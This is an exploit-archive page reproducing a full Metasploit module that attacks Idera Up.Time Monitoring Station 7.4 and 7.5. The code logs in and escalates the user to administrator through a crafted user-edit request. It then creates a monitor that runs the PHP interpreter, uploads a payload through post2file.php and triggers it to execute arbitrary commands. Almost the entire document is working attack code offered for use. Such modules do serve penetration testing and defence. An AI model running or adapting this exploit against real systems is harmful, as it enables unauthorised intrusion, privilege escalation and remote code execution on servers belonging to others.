Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload Version 2



EKU-ID: 5241 CVE: OSVDB-ID:
Author: Denis Andzakovic Published: 2015-11-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit4 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Idera Up.Time Monitoring Station 7.4 post2file.php Arbitrary File Upload',
      'Description'     => %q{
        This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.

        The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,
        which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated
        by the vendor.

        Although the mitigiation in place will prevent uptime_file_upload_1.rb from working, it
        can still be bypassed and gain privilege escalation, and allows the attacker to upload file
        again, and execute arbitrary commands.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Denis Andzakovic', # Found file upload bug in post2file.php in 2013
          'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
          'Gjoko Krstic(LiquidWorm) <gjoko[at]zeroscience.mk>'
        ],
      'References'      =>
        [
          ['EDB', '37888'],
          ['URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php']
        ],
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Targets'        => [['Automatic', {}]],
       'Privileged'     => 'true',
       'DefaultTarget'  => 0,
       # The post2file.php vuln was reported in 2013 by Denis Andzakovic. And then on Aug 2015,
       # it was discovered again by Ewerson 'Crash' Guimaraes.
       'DisclosureDate' => 'Nov 18 2013'
    ))

    register_options(
      [
        Opt::RPORT(9999),
        OptString.new('USERNAME', [true, 'The username to authenticate as', 'sample']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'sample'])
      ], self.class)

    register_advanced_options(
      [
        OptString.new('UptimeWindowsDirectory', [true, 'Uptime installation path for Windows', 'C:\\Program Files\\uptime software\\']),
        OptString.new('UptimeLinuxDirectory', [true, 'Uptime installation path for Linux', '/usr/local/uptime/']),
        OptString.new('CmdPath', [true, 'Path to cmd.exe', 'c:\\windows\\system32\\cmd.exe'])
      ], self.class)
  end

  def print_status(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  def print_error(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  def print_good(msg='')
    super("#{rhost}:#{rport} - #{msg}")
  end

  # Application Check
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path)
    )

    unless res
      vprint_error("Connection timed out.")
      return Exploit::CheckCode::Unknown
    end

    n = Nokogiri::HTML(res.body)
    uptime_text = n.at('//ul[@id="uptimeInfo"]//li[contains(text(), "up.time")]')

    if uptime_text
      version = uptime_text.text.scan(/up\.time ([\d\.]+)/i).flatten.first
      vprint_status("Found version: #{version}")
      if version >= '7.4.0' && version <= '7.5.0'
        return Exploit::CheckCode::Appears
      end
    end

    Exploit::CheckCode::Safe
  end

  def create_exec_service(*args)
    cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs = *args
    res_service = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'main.php'),
      'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
      'vars_get' => {
        'section'          => 'ERDCInstance',
        'subsection'       => 'add',
      },
      'vars_post' => {
        'initialERDCId' => '20',
        'target' => '1',
        'targetType' => 'systemList',
        'systemList' => '1',
        'serviceGroupList' => '-10',
        'initialMode' => 'standard',
        'erdcName' => 'Exploit',
        'erdcInitialName' => '',
        'erdcDescription' => 'Exploit',
        'hostButton' => 'system',
        'erdc_id' => '20',
        'forceReload' => '0',
        'operation' => 'standard',
        'erdc_instance_id' => '',
        'label_[184]' => 'Script Name',
        'value_[184]' => cmd,
        'id_[184]' => 'process',
        'name_[process]' => '184',
        'units_[184]' => '',
        'guiBasic_[184]' => '1',
        'inputType_[184]' => 'GUIString',
        'screenOrder_[184]' => '1',
        'parmType_[184]' => '1',
        'label_[185]' => 'Arguments',
        'value_[185]' => cmdargs,
        'id_[185]' => 'args',
        'name_[args]' => '185',
        'units_[185]' => '',
        'guiBasic_[185]' => '1',
        'inputType_[185]' => 'GUIString',
        'screenOrder_[185]' => '2',
        'parmType_[185]' => '1',
        'label_[187]' => 'Output',
        'can_retain_[187]' => 'false',
        'comparisonWarn_[187]' => '-1',
        'comparison_[187]' => '-1',
        'id_[187]' => 'value_critical_output',
        'name_[output]' => '187',
        'units_[187]' => '',
        'guiBasic_[187]' => '1',
        'inputType_[187]' => 'GUIString',
        'screenOrder_[187]' => '4',
        'parmType_[187]' => '2',
        'label_[189]' => 'Response time',
        'can_retain_[189]' => 'false',
        'comparisonWarn_[189]' => '-1',
        'comparison_[189]' => '-1',
        'id_[189]' => 'value_critical_timer',
        'name_[timer]' => '189',
        'units_[189]' => 'ms',
        'guiBasic_[189]' => '0',
        'inputType_[189]' => 'GUIInteger',
        'screenOrder_[189]' => '6',
        'parmType_[189]' => '2',
        'timing_[erdc_instance_monitored]' => '1',
        'timing_[timeout]' => '60',
        'timing_[check_interval]' => '10',
        'timing_[recheck_interval]' => '1',
        'timing_[max_rechecks]' => '3',
        'alerting_[notification]' => '1',
        'alerting_[alert_interval]' => '120',
        'alerting_[alert_on_critical]' => '1',
        'alerting_[alert_on_warning]' => '1',
        'alerting_[alert_on_recovery]' => '1',
        'alerting_[alert_on_unknown]' => '1',
        'time_period_id' => '1',
        'pageFinish' => 'Finish',
        'pageContinue' => 'Continue...',
        'isWizard' => '1',
        'wizardPage' => '2',
        'wizardNumPages' => '2',
        'wizardTask' => 'pageFinish',
        'visitedPage[1]' => '1',
        'visitedPage[2]' => '1'
      })
  end

  def exploit
    vprint_status('Trying to login...')
    # Application Login
    res_auth = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'index.php'),
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      })

    unless res_auth
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
    end

    # Check OS
    phpfile_name = rand_text_alpha(10)
    if res_auth.headers['Server'] =~ /Unix/
      vprint_status('Found Linux installation - Setting appropriated PATH')
      phppath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'apache/bin/ph')
      uploadpath = Rex::FileUtils.normalize_unix_path(datastore['UptimeLinuxDirectory'], 'GUI/wizards')

      cmdargs = "#{uploadpath}#{phpfile_name}.txt"
      cmd = phppath
    else
      vprint_status('Found Windows installation - Setting appropriated PATH')
      phppath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'apache\\php\\php.exe')
      uploadpath = Rex::FileUtils.normalize_win_path(datastore['UptimeWindowsDirectory'], 'uptime\\GUI\\wizards\\')
      cmd = datastore['CmdPath']
      cmdargs = "/K \"\"#{phppath}\" \"#{uploadpath}#{phpfile_name}.txt\"\""
    end

    if res_auth.get_cookies =~ /login=true/
      cookie = Regexp.last_match(1)
      cookie_split = res_auth.get_cookies.split(';')
      vprint_status("Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
      print_good('Login success')

      # Privilege escalation getting user ID
      res_priv = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'main.php'),
        'vars_get' => {
          'page'    => 'Users',
          'subPage' => 'UserContainer'
        },
       'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
      )

      unless res_priv
        fail_with(Failure::Unknown, 'Connection timed out while getting userID.')
      end

      matchdata = res_priv.body.match(/UPTIME\.CurrentUser\.userId\.*/)

      unless matchdata
        fail_with(Failure::Unknown, 'Unable to find userID for escalation')
      end

      get_id = matchdata[0].gsub(/[^\d]/, '')
      vprint_status('Escalating privileges...')

      # Privilege escalation post
      res_priv_elev = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'main.php'),
        'vars_get' => {
          'section'          => 'UserContainer',
          'subsection'       => 'edit',
          'id'               => "#{get_id}"
        },
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_post' => {
          'operation' => 'submit',
          'disableEditOfUsernameRoleGroup' => 'false',
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD'],
          'passwordConfirm' => datastore['PASSWORD'],
          'firstname' => rand_text_alpha(10),
          'lastname' => rand_text_alpha(10),
          'location' => '',
          'emailaddress' => '',
          'emailtimeperiodid' => '1',
          'phonenumber' => '',
          'phonenumbertimeperiodid' => '1',
          'windowshost' => '',
          'windowsworkgroup' => '',
          'windowspopuptimeperiodid' => '1',
          'landingpage' => 'MyPortal',
          'isonvacation' => '0',
          'receivealerts' => '0',
          'activexgraphs' => '0',
          'newuser' => 'on',
          'newuser' => '1',
          'userroleid' => '1',
          'usergroupid[]' => '1'
        }
      )

      unless res_priv_elev
        fail_with(Failure::Unknown, 'Connection timed out while escalating...')
      end

      # Refresing perms
      vprint_status('Refreshing perms...')
      res_priv = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'index.php?loggedout'),
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}"
      )

      unless res_priv
        fail_with(Failure::Unknown, 'Connection timed out while refreshing perms')
      end

      res_auth = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'index.php'),
        'vars_post' => {
          'username' => datastore['USERNAME'],
          'password' => datastore['PASSWORD']
        }
      )

      unless res_auth
        fail_with(Failure::Unknown, 'Connection timed out while authenticating...')
      end

      if res_auth.get_cookies =~ /login=true/
        cookie = Regexp.last_match(1)
        cookie_split = res_auth.get_cookies.split(';')
        vprint_status("New Cookies Found: #{cookie_split[1]} #{cookie_split[2]}")
        print_good('Priv. Escalation success')
      end

      # CREATING Linux EXEC Service
      if res_auth.headers['Server'] =~ /Unix/
        vprint_status('Creating Linux Monitor Code exec...')
        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)

      else
        # CREATING Windows EXEC Service#
        vprint_status('Creating Windows Monitor Code exec...')
        create_exec_service(cookie_split, rhost, uploadpath, phppath, phpfile_name, cmd, cmdargs)
      end

      # Upload file
      vprint_status('Uploading file...')
      up_res = send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'wizards', 'post2file.php'),
        'vars_post' => {
          'file_name' => "#{phpfile_name}.txt",
          'script'    => payload.encoded
        }
      )

      unless up_res
        fail_with(Failure::Unknown, 'Connection timed out while uploading file.')
      end

      vprint_status('Checking Uploaded file...')
      res_up_check = send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'wizards', "#{phpfile_name}.txt")
      )

      if res_up_check && res_up_check.code == 200
        print_good("File found: #{phpfile_name}")
      else
        print_error('File not found')
        return
      end

      # Get Monitor ID

      vprint_status('Fetching Monitor ID...')
      res_mon_id = send_request_cgi(
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path, 'ajax', 'jsonQuery.php'),
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_get' => {
          'query'               => 'GET_SERVICE_PAGE_ERDC_LIST',
          'iDisplayStart'       => '0',
          'iDisplayLength'      => '10',
          'sSearch'             => 'Exploit'
        }
       )

      unless res_mon_id
        fail_with(Failure::Unknown, 'Connection timed out while fetching monitor ID')
      end

      matchdata = res_mon_id.body.match(/id=?[^>]*>/)

      unless matchdata
        fail_with(Failure::Unknown, 'No monitor ID found in HTML body. Unable to continue.')
      end

      mon_get_id = matchdata[0].gsub(/[^\d]/, '')
      print_good("Monitor id aquired:#{mon_get_id}")
      # Executing monitor
      send_request_cgi(
        'method' => 'POST',
        'uri'    => normalize_uri(target_uri.path, 'main.php'),
        'cookie' => "#{cookie_split[1]}; #{cookie_split[2]}",
        'vars_post' => {
          'section'    => 'RunERDCInstance',
          'subsection' => 'view',
          'id'         => mon_get_id,
          'name'       => 'Exploit'
        }
      )
    else
      print_error('Cookie not found')
    end
  end
end